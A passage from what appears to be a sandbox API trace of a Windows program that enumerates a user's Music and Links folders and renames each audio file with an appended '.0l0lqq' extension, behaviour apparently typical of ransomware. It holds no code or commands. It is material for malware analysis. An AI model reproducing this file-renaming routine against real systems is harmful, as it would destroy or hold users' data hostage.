lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fl7Fzrs.wav", lpFilePart=0x0) returned 0x2f [0255.180] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fl7Fzrs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fl7fzrs.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fl7Fzrs.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fl7fzrs.wav.0l0lqq")) returned 1 [0255.190] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GnfU6Z-X0Kto7uk.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gnfu6z-x0kto7uk.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GnfU6Z-X0Kto7uk.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gnfu6z-x0kto7uk.m4a.0l0lqq")) returned 1 [0255.200] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Hn0jROsDkd.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hn0jrosdkd.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Hn0jROsDkd.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hn0jrosdkd.m4a.0l0lqq")) returned 1 [0255.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ilzNwr6K0-M3Kz.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ilzNwr6K0-M3Kz.wav", lpFilePart=0x0) returned 0x36 [0255.209] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ilzNwr6K0-M3Kz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ilznwr6k0-m3kz.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ilzNwr6K0-M3Kz.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ilznwr6k0-m3kz.wav.0l0lqq")) returned 1 [0255.212] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LH4L.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LH4L.wav", lpFilePart=0x0) returned 0x2c [0255.220] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LH4L.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lh4l.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LH4L.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lh4l.wav.0l0lqq")) returned 1 [0255.223] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\M8kWkNF68au.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\M8kWkNF68au.mp3", lpFilePart=0x0) returned 0x33 [0255.227] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\M8kWkNF68au.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m8kwknf68au.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\M8kWkNF68au.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m8kwknf68au.mp3.0l0lqq")) returned 1 [0255.233] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mqKv.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mqKv.mp3", lpFilePart=0x0) returned 0x2c [0255.238] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mqKv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mqkv.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mqKv.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mqkv.mp3.0l0lqq")) returned 1 [0255.242] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MynuZ6aNUi.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MynuZ6aNUi.m4a", lpFilePart=0x0) returned 0x32 [0255.248] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MynuZ6aNUi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mynuz6anui.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MynuZ6aNUi.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mynuz6anui.m4a.0l0lqq")) returned 1 [0255.255] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\prZy nTBKiTt3Og.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\przy ntbkitt3og.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\prZy nTBKiTt3Og.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\przy ntbkitt3og.mp3.0l0lqq")) returned 1 [0255.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rN62yqHdWeu.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rN62yqHdWeu.wav", lpFilePart=0x0) returned 0x33 [0255.268] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rN62yqHdWeu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rn62yqhdweu.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rN62yqHdWeu.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rn62yqhdweu.wav.0l0lqq")) returned 1 [0255.277] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s1vqb-bDkSerJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\s1vqb-bdkserj.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s1vqb-bDkSerJ.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\s1vqb-bdkserj.mp3.0l0lqq")) returned 1 [0255.283] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Spv4lZV4QRobY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\spv4lzv4qroby.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Spv4lZV4QRobY.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\spv4lzv4qroby.mp3.0l0lqq")) returned 1 [0255.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TeqobhMtVNMUhyZ1gwDZ.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TeqobhMtVNMUhyZ1gwDZ.mp3", lpFilePart=0x0) returned 0x3c [0255.292] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TeqobhMtVNMUhyZ1gwDZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\teqobhmtvnmuhyz1gwdz.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TeqobhMtVNMUhyZ1gwDZ.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\teqobhmtvnmuhyz1gwdz.mp3.0l0lqq")) returned 1 [0255.295] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UNt smOIZH.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UNt smOIZH.m4a", lpFilePart=0x0) returned 0x32 [0255.300] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UNt smOIZH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\unt smoizh.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UNt smOIZH.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\unt smoizh.m4a.0l0lqq")) returned 1 [0255.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vlL8C6yl5y.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vlL8C6yl5y.mp3", lpFilePart=0x0) returned 0x32 [0255.311] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vlL8C6yl5y.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vll8c6yl5y.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vlL8C6yl5y.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vll8c6yl5y.mp3.0l0lqq")) returned 1 [0255.314] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wvw9g.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wvw9g.m4a", lpFilePart=0x0) returned 0x2d [0255.317] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wvw9g.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wvw9g.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wvw9g.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wvw9g.m4a.0l0lqq")) returned 1 [0255.324] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wXRtldph2BF4ZYHrXn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wxrtldph2bf4zyhrxn.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wXRtldph2BF4ZYHrXn.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wxrtldph2bf4zyhrxn.wav.0l0lqq")) returned 1 [0255.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\x4a2o.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\x4a2o.m4a", lpFilePart=0x0) returned 0x2d [0255.329] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\x4a2o.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\x4a2o.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\x4a2o.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\x4a2o.m4a.0l0lqq")) returned 1 [0255.341] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xfzL_V5vnmdiqX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xfzl_v5vnmdiqx.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xfzL_V5vnmdiqX.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xfzl_v5vnmdiqx.m4a.0l0lqq")) returned 1 [0255.344] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xgpNh-DmsJj0OhJzt.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xgpNh-DmsJj0OhJzt.wav", lpFilePart=0x0) returned 0x39 [0255.349] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xgpNh-DmsJj0OhJzt.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xgpnh-dmsjj0ohjzt.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xgpNh-DmsJj0OhJzt.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xgpnh-dmsjj0ohjzt.wav.0l0lqq")) returned 1 [0255.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YfBdjdFR0JACx i.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YfBdjdFR0JACx i.mp3", lpFilePart=0x0) returned 0x37 [0255.354] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YfBdjdFR0JACx i.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yfbdjdfr0jacx i.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YfBdjdFR0JACx i.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yfbdjdfr0jacx i.mp3.0l0lqq")) returned 1 [0255.359] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YN vq4wn RqkXdR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yn vq4wn rqkxdr.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YN vq4wn RqkXdR.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yn vq4wn rqkxdr.mp3.0l0lqq")) returned 1 [0255.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_j7ZhZm76jJuFLIjsl.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_j7ZhZm76jJuFLIjsl.wav", lpFilePart=0x0) returned 0x3a [0255.366] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_j7ZhZm76jJuFLIjsl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_j7zhzm76jjuflijsl.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_j7ZhZm76jJuFLIjsl.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_j7zhzm76jjuflijsl.wav.0l0lqq")) returned 1 [0255.384] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.384] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.384] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0255.384] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0255.384] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0255.385] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0255.385] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0255.385] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.385] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.385] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0255.385] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0255.386] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0255.386] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.386] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0255.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x31 [0255.406] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.407] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.407] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0255.407] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0255.407] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0255.407] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0255.408] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.408] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0255.408] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.408] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | 